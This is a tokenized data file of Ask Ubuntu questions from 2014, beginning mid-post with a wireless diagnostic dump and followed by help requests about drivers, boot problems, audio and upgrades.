c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : b6b8aa929b5f982954a6de1 depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : c21fc2f90947540319de390 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x1969:0x10a1 ( alx ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8179 ( rtl8188ee ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 9.624682 ] rtl8188ee : using firmware rtlwifi/rtl8188efw.bin [ 9.624741 ] rtl8188ee 0000:02:00.0 : irq 45 for msi/msi-x [ 9.924965 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 9.925132 ] rtlwifi : wireless switch is on [ 18.918325 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 18.918581 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 43.903719 ] wlan0 : authenticate with < mac address removed > [ 43.913895 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 43.915033 ] wlan0 : authenticated [ 43.917383 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 43.932789 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 43.932928 ] wlan0 : associated [ 43.932935 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 59.926537 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 61.431876 ] wlan0 : authenticate with < mac address removed > [ 61.451881 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 61.453694 ] wlan0 : authenticated [ 61.455569 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 61.469978 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 61.470130 ] wlan0 : associated [ 685.299878 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 686.755325 ] wlan0 : authenticate with < mac address removed > [ 686.764888 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 686.766551 ] wlan0 : authenticated [ 686.770599 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 686.775232 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=3 ) [ 686.775395 ] wlan0 : associated [ 732.676315 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 733.622817 ] wlan0 : authenticate with < mac address removed > [ 733.642409 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 733.644589 ] wlan0 : authenticated [ 733.646068 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 733.660412 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 733.660569 ] wlan0 : associated [ 768.243619 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 963.122973 ] wlan0 : authenticate with < mac address removed > [ 963.142715 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 963.144191 ] wlan0 : authenticated [ 963.146329 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 963.162557 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=6 ) [ 963.162723 ] wlan0 : associated [ 1008.407427 ] wlan0 : connection to ap < mac address removed > lost [ 1010.458107 ] wlan0 : authenticate with < mac address removed > [ 1010.477578 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1010.478699 ] wlan0 : authenticated [ 1010.481203 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1010.495617 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=6 ) [ 1010.495788 ] wlan0 : associated [ 1284.910957 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 1607.970540 ] wlan0 : authenticate with < mac address removed > [ 1607.979974 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1607.982241 ] wlan0 : authenticated [ 1607.985604 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1607.989180 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=3 ) [ 1607.989347 ] wlan0 : associated [ 1641.945884 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 1643.299913 ] wlan0 : authenticate with < mac address removed > [ 1643.319630 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1643.321682 ] wlan0 : authenticated [ 1643.323277 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1643.338946 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=5 ) [ 1643.339113 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # # edit : my laptop is a toshiba satellite s55-a5294 . after upgrading my kernel to 3.14.1 and 3.14.2 ( currently using ) my wireless is now usable sometimes ( which makes me happy ) . i lose 0 % of packets about 70 % of the time and anywhere from 1-100 % of packet loss the other 30 % . reconnecting to my wireless network is the only solution i found so far , but it does not always fix the issue . /var/log/syslog when issue is occurring when losing 100 % of packets tail -f /var/log/syslog may 5 13:05:19 kyle-pc networkmanager [ 1107 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated may 5 13:05:20 kyle-pc networkmanager [ 1107 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake may 5 13:05:20 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : wpa : key negotiation completed with 00:1d : d2:60:3b:10 [ ptk=ccmp gtk=tkip ] may 5 13:05:20 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-connected - connection to 00:1d : d2:60:3b:10 completed [ id=0 id_str= ] may 5 13:05:20 kyle-pc networkmanager [ 1107 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed may 5 13:05:59 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:04:52 kyle-pc whoopsie [ 1332 ] : message repeated 10 times : [ online ] may 5 13:06:11 kyle-pc whoopsie [ 1332 ] : offline may 5 13:06:31 kyle-pc whoopsie [ 1332 ] : offline may 5 13:06:56 kyle-pc whoopsie [ 1332 ] : online may 5 13:08:16 kyle-pc whoopsie [ 1332 ] : message repeated 5 times : [ online ] may 5 13:09:16 kyle-pc whoopsie [ 1332 ] : offline may 5 13:09:21 kyle-pc whoopsie [ 1332 ] : online when losing anywhere from 1-99 % of packets tail -f /var/log/syslog may 5 13:29:48 kyle-pc networkmanager [ 1107 ] : < info > activation ( wlan0 ) successful , device activated . may 5 13:29:48 kyle-pc whoopsie [ 1332 ] : message repeated 7 times : [ offline ] may 5 13:29:49 kyle-pc whoopsie [ 1332 ] : online may 5 13:29:54 kyle-pc ntpdate [ 12460 ] : adjust time server 91.189.89.199 offset 0.012340 sec may 5 13:30:05 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:30:08 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:30:48 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:30:51 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:31:51 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:33:14 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:33:17 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:34:46 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:36:57 kyle-pc wpa_supplicant [ 12275 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] may 5 13:37:00 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:38:57 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:39:00 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:39:46 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:40:57 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:41:00 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:42:57 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:43:00 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:44:46 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:44:57 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:45:00 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 5 13:46:57 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:48:57 kyle-pc wpa_supplicant [ 12275 ] : wlan0 : ctrl-event-scan-started may 5 13:49:00 kyle-pc wpa_supplicant [ 12275 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 i am unsure if these logs are any indication of the cause of this issue or just a notification that it is occurring . any ideas would be greatly appreciated .
451727	error sending ussd ubuntu 14.04	gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface 'org.freedesktop.modemmanager1.modem.modem3gpp.ussd ' on object at path /org/freedesktop/modemmanager1/modem/2 modem manager gui work properly in ubuntu 13.10 after upgrade to ubuntu 14.04 ca n't send ussd.i have a huawei e158 usb router and asus n53t laptop , help me to solve this problem . when i install ubuntu resevied this message ! but i have latest bios
451728	how do i install the realtek audio drivers to get my mic working on lubuntu ?	i currently have lubuntu 14.04 64 bit installed and i 'm a complete noob at linux entirely . i want to get my realtek audio driver install because i think that 's why my mic is n't showing up in any of my virtual machines . i 'm running vmware workstation and in a windows 7 virtual machine , it shows that a mic is installed but whenever i talk into my mic , the mic tester does n't show any activity on the mic . i 've tried using google to install realtek drivers , but none of them worked . i 'm sure it 's because i 've only been using lubuntu for 2 days and have yet to figure out how to run anything . is there any simple command like : sudo apt-get install realtek ? i 'll give you anymore information you need , i just need help . any assistance would be helpful .
451729	how to install ubuntu 64 on second ( new ) hard drive , with ubuntu installed on current ( old ) hard drive uefi bios mobo	i have a uefi mobo ( asus a88xm-a ) where i have ( 2 ) 3tb hard drives sata . i had played for days to install ubuntu 12.04.4 but could n't get it installed , so i finally paid the store i purchased the new system from to install it . they installed me a usb with the imgburn.exe , universal-usb-installer-1.9.5.2.exe , and ubuntu-12.04.4-desktop-amd64.iso . uname -a 3.5.0-48-generic # 72~precise1-ubuntu smp tue mar 11 20:09:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux i want to re-install my ubuntu os to the sta drive rather than the stb drive as currently installed . 1 . to be sure i can re-install . 2 . use clonezilla to clone sda to sdb . i gparted my new drive to : /dev/sda1 unknown 1.95gb bios_grub /dev/sda2 ext3 893.62gb boot /dev/sda3 ext3 1.81tb ( data ) /dev/sda4 linux-swap 46.87gb then i used the usb drive to install which it does to sda2 , i have to f6 -nomodeset because of the graphics ... i believe . but anyway this does n't boot , i have 2 boot options 3.5.0-48 is the one that works , but the one that does n't boot is 3.5.0-23 . this failed goes to a blank screen with an error message and a long number field in the upper left corner of my monitor . so after days of trying to re-install ubuntu to new 3tb hard drive , i have no success . i do n't understand how to proceed . of course i enjoy ubuntu , but seriously days to install is seriously frustrating . any help please would be greatly appreciated . thanks in advance -- further details â i used unetbootin and startup disk creator to create second bootable usb . both usb 's work fine on my non uefi laptop , but neither will install to my uefi new drive to allow me the ability to boot to the new drive . -- i believe this uuid line was the error i received when attempting to boot to the new install on new disk . my /etc/fstab : uuid=549427be-6899-435a-8d0c-84fbf8f4774e / ext4 errors=remount-ro 0 1 # swap was on /dev/sda3 during installation uuid=93455bca-22a9-43a0-bed8-82152dd3e0e5 none swap sw 0 0
451730	why ca n't i install more than one application at once ?	why ca n't apt install more than one application at a time ? why does it need to exit before installing the next . i know with ms windows you can install how many application at once . this problem is not unique to ubuntu but to all distros , that i have notice .
451731	lenovo thinkpad x200 tablet restarts randomly	i have ubuntu 12.04 installed on my lenovo thinkpad x200 tablet . it restarts occasionally all of a sudden . i have taken it to a lenovo service centre . they seem to have found no hardware faults . i did a memtest for ram overnight and it came out perfect . i need to find out what is causing these restarts . how do i do that ? the restarts really are truly random . i am working solely on ac power . i have removed the battery . this has significantly reduced the restarts , but it still happens . i also considered if it is because the computer is overheating . that was ruled out because sometimes this happens just after it boots up . the restarts are not bothersome enough to buy a new laptop nor are they too occasional to not consider it .
451738	ubuntu desktop settings menu replaced with one from ubuntu touch ?	okay so i have a really weird issue , my settings menu in ubuntu 13.10 ( desktop ) has been replaced with what appears to be the one from ubuntu touch . it even has a button labeled `` about this phone '' . the only weird thing that may have caused this ( that i can think of ) is last night while setting up my computer to build android , i accidentally ran sudo apt-get purge java* to get rid of openjdk , instead of specifying openjdk . when i ran this it seemed like uninstalled a bit to much ( and i am wondering if the normal menu got removed ) . that or i had the build environment setup for ubuntu touch at one point too , which may have installed this ? ? any ideas , on what might have caused this and/or how to fix it ? here is a picture of it : https : //plus.google.com/u/0/photos/108062965196949420402/albums/6004544167291557265 sorry if i tagged this wrong it would not let me add the ubuntu-desktop tag .
451742	can not reboot after upgrade to ubuntu 14.04 from 12.04 sometimes	my laptop : lenovo v460 i upgraded it from ubuntu 12.04 to 14.04 . sometimes it fails to reboot ( from both terminal and desktop ) and just hangs there . i just observe several points blinking one after another . my laptop worked well when i was under ubuntu 12.04 . could anyone explain what is causing this problem and how to fix it ? many thanks .
451743	ca n't boot any linux based distro ( error : attempt to read or write outside of disk 'hd0 ' )	i 'm new to linux os and i wanted to install a distro for my old laptop ( hp compac nc6400 ) . tried with lubuntu , xubuntu , ubuntu ( 14.04 all of them ) and lxle , and all of them had a single problem : after installing them into the laptop i got this when i booted error : attempt to read or write outside of disk 'hd0 ' entering rescue mode ... grub rescue > i downloaded boot-repair ( saw it on another post ) and did the recommended repair but nothing changed at all . got this link : http : //paste.ubuntu.com/7295828/ please help , thanks for reading
451744	correct handling of application uris from unity dash	at some point , unity changed the uri type it returned when a drag-n-drop operation occurred of applications from the unity dash to a gtk window in an app i wrote . in 13.04 ( unity 7.0 ) , the data call back received a text/uri-list with the full path , e.g . file : //usr/share/applications/app.desktop now however , it 's a test/uri-list like this : application : //app.desktop how do i get it to give me the full path to app.desktop ? or can i use the uri to get an appinfo object ?
451748	ubuntu 14.04,32 or 64 bits with 2 gb of ram ?	i have an amd athlon ( tm ) 64 x2 dual core processor 5200+ ă 2 , with an nvidia gt 220 and 2 gb of ram . i am currently running 13.10 . do you think it would be better to upgrade to 14.04 in 64 or 32 bits ? thanks .
451749	i accidentally killed all of my pulseaudio , now i have no sound .	ok i made a mistake . i was investigating on how to make it so that i could listen to music or watch videos when i was n't using qjackctl after being connected to the computer . this is the youtube video i found jack and pulseaudio together as friends-linux . the problem that i ran into is he does n't go into how to restart pulseaudio , he just says to do it . and so i did some more research on how and came up with this for the terminal : killall pulseaudio . following this i typed pulseaudio check . now i no longer have a volume symbol in the top right of my computer and i can not hear anything . additionally , qjackctl and zyanaddsubfx no longer work . please help , i appreciate all of your support .
451750	ubuntu 14.04 window navigation buttons too small	i was trying out different themes and now my navigation buttons ( back , location , search , etc ) are too small and has a weird white corner on either side , i ca n't find a way to get it back to the original size .
451751	how do i restore bootloader to windows ?	i did a bootinfoscript , pasted at http : //paste.ubuntu.com/7288803/ . only os is windows 8 . notice on line 6 no boot loader is installed in the mbr of /dev/sda booting to windows recovery disk and bootrec /rebuildbcd does not work , detects windows 8 and then says the device where windows is could not be found and then fails , so i 've no idea what to do . please help ?
451754	is there a lower-graphics setting ?	beginning ubuntu user here . i just installed ubuntu 14.04 32-bit on an old dell computer to replace windows xp . i like the interface , but i notice that it responds very slowly . i suspect this is due to my older graphics card . is there a way i can disable some of the animation in the interface , or is there a version of ubuntu that is less graphics-intensive ?
451756	ubuntu 14.04 quit suddenly , wo n't boot now , `` recursive partition table ''	while running my recently updated ubuntu 14.04 system , the screen suddenly went black and unresponsive . i do n't remember exactly what i was doing at the time , but it was something simple like running chromium or thunderbird . not system stuff . i forced a power-off , and now the system wo n't reboot , saying `` insert system disk '' . i booted a peppermint linux live from cd and started gparted , but it said there was a `` recursive partition table '' . i 'm sorry to say that i 'm nearly clueless as to how to fix this or at least recover my data from the hard drive . would something like re-writing the mbr help ? i really do n't want to have to rebuild my system .
451759	how do i bring back the initial 'stats page ' ( message of the day ) after an upgrade to 14.04 server ?	i 've been using ubuntu server for quite a while , and i like seeing this when i log on over ssh : welcome to ubuntu 13.04 ( gnu/linux 3.8.0-35-generic x86_64 ) * documentation : https : //help.ubuntu.com/ system information as of mon apr 21 02:06:46 utc 2014 system load : 0.0 processes : 88 usage of / : 64.8 % of 7.75gb users logged in : 0 memory usage : 64 % ip address for eth0 : xx.xx.xxx.xxx swap usage : 0 % graph this data and manage this system at : https : //landscape.canonical.com/ get cloud support with ubuntu advantage cloud guest : http : //www.ubuntu.com/business/services/cloud use juju to deploy your cloud instances and workloads : https : //juju.ubuntu.com/ # cloud-raring 0 packages can be updated . 0 updates are security updates . *** /dev/xvda1 will be checked for errors at next reboot *** last login : fri apr 18 21:29:50 2014 from bla-bla-bla.foo.bar.net ubuntu @ ip-xx-yy-zzz-aaa : ~ $ after upgrading one of my servers to 14.04 , though , i only see this : $ ssh closet last login : sun apr 20 19:42:57 2014 from 192.168.0.7 me @ server1 : ~ $ i do n't like this as much . how can i bring back the old welcome screen ?
451761	is it safe to install cinnamon de on 12.04	last time i tried , there was a surge of data an disk space because full in an hour or two . not sure where i was wrong . i really want to try cinnamon once more and heard that there is some pact between ubuntu and linux mint which resolved the issues . so shall i go ahead ? if yes , please tell me how or from where to install latest version of cinnamon de . thanks .
451762	wifi problems with 12.04 on toshiba chromebook	just installed ubuntu 12.04 via crouton on a toshiba chromebook cb35-a3120 . when i clicked on network the response was `` the system network services are not compatible with this version . what i have read on ask ubuntu suggests a fixable incompatibility with the toshiba 's wifi hardware . but i 'm acomplete noob on linux , and have n't been able to disentangle what specific commands are needed to correct the problem . can anyone help ?
451763	i changed the window type of an application in kde to `` desktop '' . how can i get it back ?	this question could be rephrased to `` what is the keyboard shortcut for accessing special window option in kde ? '' because i can not access them after blocking myself out . is there a keyboard shortcut for this ?
451766	ubuntu 14.04 unresponsive	here 's what i 've done : fresh install of 14.04 64-bit installed fahclient and monitor . wanted to install nvidia drivers so i could fold with my nvidia cards . opened a terminal window and ran : sudo i sudo apt-get -- purge remove xserver-xorg-video-nouveau sudo apt-get install nvidia-current then i rebooted . now ubuntu will install fah but not the gui and will only show a blinking cursor in the upper left hand corner of the screen . i can tell by the cpu cooling fans it 's running fah and has even sent a work unit back , but will not respond to ctrl-alt-f1 , or even ctrl-alt-delete . only way to do anything is to power down and restart , but that only leaves me right back with the blinking cursor . any help will be greatly appreciated .
451768	can not recognize atom of ligand in docking	i am going to run docking using autodock 4.2 . however , once i want to run the docking , an error occured , missing atom of na , please add to parameter library first ! how to add in parameter library when the ligand atom type could not be recognize for docking process ? thanks .
451770	how do i upgrade my ubuntu server from one lts version to another ? is this safe ?	i like to keep all my servers running only the most stable versions of any operating system , so obviously i only run the lts versions of ubuntu . i currently have a few servers running ubuntu server 12.04 lts . i 'd like to upgrade them to 14.04 . is it save to jump versions like that , and and how can this be done ?
451771	can not paste text into mail web app window	i have tried the new feature from ubuntu 14.04 with mail web app browser window . but it 's impossible to paste a text into a compose new message window .
451772	unknown filesystem , grub rescue	when i try to boot i get this message : error : unknown filesystem . entering rescue mode ... grub rescue > results of : grub rescue > ls is as follows : ( hd0 ) ( hd0 , msdos1 )
451773	what are the differene between fglrx and fglrx-updates ?	what are the difference between the two ati drivers fglrx and fglrx-updates , and what one should i install with a machine with an amd r7 260x video card ? i have found outdated information on the steam forums that said there were the same driver , and where can i find up to date information on these two drivers ?
451779	how can i enable/disable desktop effects for the current window in kde ?	i am looking for a keyboard shortcut or option to quickly toggle whether an application/window is affected by the compositor . is there any way to do that ?
451781	hdmi sound is gone	first , i 've installed ubuntu 13.10 . it could use hdmi sound on my monitor lg 23ea73 . now , i 've updated my system to ubuntu 14.04 . and my hdmi sound device had gone . how to fix it ? update : this problem is coming and leaving/ now i can see hdmi/displayport2 , but last time i switched on my pc , i could n't see it .
451784	keyboard backlight samsung ativ 6	i have a samsung ativ 6 , it 's my first notebook , and i 'm new with ubuntu and having some problems ; p my keyboard backlight does n't work , i 've already made a big search and could n't solve the problem . so , if someone know what i can do , please tell me .
451786	renaming a file without changing its file type	ok , so i like to play minecraft on ubuntu 12.10 and i do n't like it how the minecraft icon says minecraft.jar but thats the only way minecraft will open properly from openjdk java 6 runtime , if i remove the .jar extension it opens with archive manager . how can i remove the extent ion and it open the right way
451791	problems with `` shutdown '' and `` logout '' after upgrading to 14.04	i have upgraded from 12.04 to 14.04 on my laptop . the upgrade was successful , but the issue is that nothing happens now when i click on `` logout '' , `` shutdown '' , `` suspend '' from the top right power icon ( not sure if this is the proper name ) ; `` systems settings '' , on the other hand works and launchs the associated window . not a big issue , though , since i can logout and shutdown from a terminal , but i 'd like to know why is this not working and how can it be fixed . any ideas on how to solve this ?
451792	wifi not working with new 14.04 install	i 've just installed 14.04 lts ( 32 bit ) on a dell latitude d620 laptop and ca n't get the wifi to work . the menu that appears when i click on the network icon ( top right ) includes no items associated with wifi . here is the output from the wifi diagnostic commands suggested in how can i debug my wireless problem ? . $ lspci -v | grep -ia 7 network 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) subsystem : dell wireless 1390 wlan mini-card flags : bus master , fast devsel , latency 0 , irq 17 memory at dfdfc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , ssb $ lsmod | grep wl wl 3028745 1 cfg80211 416271 1 wl lib80211 14040 1 wl $ lsmod | grep ssb [ no output from this command ] $ dmesg | grep wl [ 12.955967 ] wl : module license 'mixed/proprietary ' taints kernel . [ 12.959685 ] wl : module verification failed : signature and/or required key missing - tainting kernel [ 12.964701 ] wl driver 6.20.155.1 ( r326264 ) failed with code 21 [ 12.964748 ] modules linked in : wl ( pof+ ) snd_hwdep snd_pcm joydev snd_seq_midi i915 ( + ) snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device gpio_ich drm_kms_helper drm hid_generic pcmcia psmouse snd yenta_socket cfg80211 soundcore lpc_ich serio_raw dell_laptop i2c_algo_bit pcmcia_rsrc snd_page_alloc irda pcmcia_core dcdbas mac_hid lib80211 video crc_ccitt lp parport usbhid hid tg3 ptp pps_core [ 12.964870 ] eip is at wdev_priv.part.7+0x3/0x5 [ wl ] [ 12.964982 ] [ ] wl_cfg80211_detach+0xc4/0xd0 [ wl ] [ 12.965023 ] [ ] wl_free_if.isra.9+0x1f/0xa0 [ wl ] [ 12.965063 ] [ ] wl_free+0x58/0x250 [ wl ] [ 12.965113 ] [ ] ? wlc_attach+0xf6c/0xfda [ wl ] [ 12.965148 ] [ ] wl_pci_probe+0x502/0xfe7 [ wl ] [ 12.965325 ] [ ] wl_module_init+0x17/0x19 [ wl ] [ 12.965474 ] eip : [ ] wdev_priv.part.7+0x3/0x5 [ wl ] ss : esp 0068 : f5027c0c $ dmesg | grep ssb [ no output from this command ] $ sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:17 memory : dfdfc000-dfdfffff *-network description : ethernet interface product : netxtreme bcm5752 gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:15 : c5:43 : e4:0d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.132 duplex=full firmware=5752-v3.19 ip=192.168.1.103 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : dfcf0000-dfcfffff $ ifconfig eth0 link encap : ethernet hwaddr 00:15 : c5:43 : e4:0d inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :215 : c5ff : fe43 : e40d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:104 errors:0 dropped:0 overruns:0 frame:0 tx packets:152 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:36522 ( 36.5 kb ) tx bytes:20320 ( 20.3 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:42 errors:0 dropped:0 overruns:0 frame:0 tx packets:42 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5280 ( 5.2 kb ) tx bytes:5280 ( 5.2 kb ) $ iwconfig lo no wireless extensions . eth0 no wireless extensions . $ iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . $ nm-tool networkmanager tool state : connected ( global ) device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : 00:15 : c5:43 : e4:0d capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.103 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 203.96.152.4 dns : 203.96.152.12 $ rfkill list all [ no output from this command ]
451795	unable to umount nfs when the server is offline	i am on ubuntu 14.04 . but i pretty much sure the problem exists in older version as well . i mounted an nfs server to my laptop ( sudo mount x.x.x.x : /home ~/nfs ) . while the nfs server is offline ( say , i am out of the office ) , i found that i am not able to list my home folder , nor can i umount the nfs folder . when i call ll ~ or sudo umount ~/nfs , the command just hang there forever . how should i fix this ? thanks !
451798	invalid username	i have installed ubuntu 12.04 version . i am unable to login with the username and password which i gave while running the wubi installer . also , while logging in as a guest user , if i even try to connect to wifi network , it prompts for root password which i have not set . its somewhat irritating . any suggestions please ? i have tried installing twice too to check whether it can resolve the problem .
451799	how can i delete ubuntu from usb installer ?	i used a usb to install ubuntu to my friend . after the installation finished , i ca n't delete contents , what can i do to format it ? since this reading this as just being part of the system and does not allow deletion . what can i do ? i would appreciate an answer . originally in spanish
451800	having issues after updating lubuntu from 13.10 to 14.04	after my netbook updated to 14.04 im having the below following issues : my netbook is over heating due to cooler wont stop spinning slow downs at most time unable to install or run flash bluetooth is not running or unable to be use ( since on 13.10 ) i 'm using a hp mini with 2gb ram and intel atom 1.66 ghz please help me out . thank you .
